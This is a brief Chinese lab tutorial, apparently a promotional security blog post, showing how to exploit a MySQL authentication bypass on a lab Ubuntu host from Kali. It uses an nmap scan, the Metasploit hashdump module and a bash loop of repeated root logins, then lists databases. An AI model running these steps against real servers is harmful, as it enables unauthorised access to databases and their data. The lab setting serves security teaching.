每天都一样,没有惊喜,没有盼头,没有期待,这是你现在的生活么。。。
---- 网易云热评
一、环境
小受:192.168.139.128 Ubuntu
小攻:192.168.139.133 Kali
二、启动MSF
1、切换root模式
sudo su
2、查询对方开放的端口信息
nmap -sT 192.168.139.128
3、启动msfconsole
4、选择要利用的模块进行验证
use auxiliary/scanner/mysql/mysql_authbypass_hashdump
5、设置目标地址
set rhosts 192.168.139.128
6、设置线程
set threads 10
7、运行
run,出现HashString说明该漏洞可以利用
8、漏洞利用
for i in `seq 1 1000`; do mysql -uroot -paiyou -h 192.168.139.128;done
9、查看存在的数据库
show databases;
禁止非法,后果自负
欢迎关注公众号:web安全工具库
欢迎关注视频号:之乎者也吧